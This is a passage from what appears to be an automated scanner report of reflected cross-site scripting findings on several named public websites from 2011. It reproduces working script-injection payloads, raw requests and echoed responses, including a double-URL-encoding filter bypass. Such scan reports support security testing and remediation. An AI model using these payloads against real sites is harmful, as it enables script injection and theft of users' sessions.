GET /en/actualite/breves/detaildfb6e"><script>alert(1)</script>f1e290a806/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 14:29:47 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web12; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/breves/detaildfb6e"><script>alert(1)</script>f1e290a806/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072">
...[SNIP]...

4.522. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.barcelonaworldrace.org
Path:	/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload c6ad4--><script>alert(1)</script>660f16bc18 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/actualite/breves/detailc6ad4--><script>alert(1)</script>660f16bc18/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 14:30:00 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web11; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<script>alert(1)</script>660f16bc18/ =>
...[SNIP]...

4.523. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.barcelonaworldrace.org
Path:	/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a93dd"><script>alert(1)</script>30c4832b29e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072a93dd"><script>alert(1)</script>30c4832b29e HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 14:30:43 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web10; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072a93dd"><script>alert(1)</script>30c4832b29e">
...[SNIP]...

4.524. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.barcelonaworldrace.org
Path:	/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f6fa"><script>alert(1)</script>9a2d7a57ebb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072?9f6fa"><script>alert(1)</script>9a2d7a57ebb=1 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:24:56 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web11; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072?9f6fa"><script>alert(1)</script>9a2d7a57ebb=1">
...[SNIP]...

4.525. http://www.barelyfitz.com/projects/tabber/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.barelyfitz.com
Path:	/projects/tabber/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9944f"><script>alert(1)</script>7b6d4f5683e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9944f\"><script>alert(1)</script>7b6d4f5683e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /projects/tabber/?9944f"><script>alert(1)</script>7b6d4f5683e=1 HTTP/1.1
Host: www.barelyfitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:24:45 GMT
Server: Apache
X-Powered-By: PHP/4.4.1
Connection: close
Content-Type: text/html
Content-Length: 14864

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML LANG="en">
<HEAD>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859
...[SNIP]...
<a href="/projects/tabber/index.php?printable_version=1&9944f\"><script>alert(1)</script>7b6d4f5683e=1" title="Print this page">
...[SNIP]...

4.526. http://www.beirut.com/Hotels/2-Stars/2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Hotels/2-Stars/2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21cfa'-alert(1)-'b99422c7d12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Hotels21cfa'-alert(1)-'b99422c7d12/2-Stars/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:36:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Hotels21cfa'-alert(1)-'b99422c7d12/2-Stars';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.527. http://www.beirut.com/Hotels/2-Stars/2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Hotels/2-Stars/2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 884f8"><a>37626885d13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Hotels884f8"><a>37626885d13/2-Stars/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:28:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Hotels884f8"><a>37626885d13">
...[SNIP]...

4.528. http://www.beirut.com/Hotels/2-Stars/2 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Hotels/2-Stars/2

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b10e'-alert(1)-'147c9ee25a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Hotels/2-Stars6b10e'-alert(1)-'147c9ee25a1/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:40:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Hotels/2-Stars6b10e'-alert(1)-'147c9ee25a1';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.529. http://www.beirut.com/Hotels/2-Stars/2 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Hotels/2-Stars/2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cdd7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e214f7752b93 was submitted in the REST URL parameter 3. This input was echoed as 9cdd7"><script>alert(1)</script>214f7752b93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /Hotels/2-Stars/29cdd7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e214f7752b93 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:44:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=blue&indexpage=Hotels&listingtype=locales.php&Types=29cdd7"><script>alert(1)</script>214f7752b93">
...[SNIP]...

4.530. http://www.beirut.com/Hotels/3-Stars/3 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Hotels/3-Stars/3

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e6f9'-alert(1)-'4c62994d9f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Hotels9e6f9'-alert(1)-'4c62994d9f5/3-Stars/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:35:43 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Hotels9e6f9'-alert(1)-'4c62994d9f5/3-Stars';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.531. http://www.beirut.com/Hotels/3-Stars/3 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Hotels/3-Stars/3

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98463"><a>f5026478805 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Hotels98463"><a>f5026478805/3-Stars/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:27:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Hotels98463"><a>f5026478805">
...[SNIP]...

4.532. http://www.beirut.com/Hotels/3-Stars/3 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Hotels/3-Stars/3

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af8c8'-alert(1)-'c8e69a03a5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Hotels/3-Starsaf8c8'-alert(1)-'c8e69a03a5e/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:43:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Hotels/3-Starsaf8c8'-alert(1)-'c8e69a03a5e';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.533. http://www.beirut.com/Hotels/3-Stars/3 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Hotels/3-Stars/3

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6bf1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e397b3f7e710 was submitted in the REST URL parameter 3. This input was echoed as e6bf1"><script>alert(1)</script>397b3f7e710 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /Hotels/3-Stars/3e6bf1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e397b3f7e710 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:49:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=green&indexpage=Hotels&listingtype=locales.php&Types=3e6bf1"><script>alert(1)</script>397b3f7e710">
...[SNIP]...

4.534. http://www.beirut.com/Hotels/4-Stars/4 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Hotels/4-Stars/4

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4223'-alert(1)-'ec523ff8242 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Hotelsd4223'-alert(1)-'ec523ff8242/4-Stars/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:37:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Hotelsd4223'-alert(1)-'ec523ff8242/4-Stars';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.535. http://www.beirut.com/Hotels/4-Stars/4 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Hotels/4-Stars/4

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ee6a"><a>0a6867e450c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Hotels3ee6a"><a>0a6867e450c/4-Stars/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:30:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Hotels3ee6a"><a>0a6867e450c">
...[SNIP]...

4.536. http://www.beirut.com/Hotels/4-Stars/4 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Hotels/4-Stars/4

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c1ea'-alert(1)-'18dc956b014 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Hotels/4-Stars6c1ea'-alert(1)-'18dc956b014/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
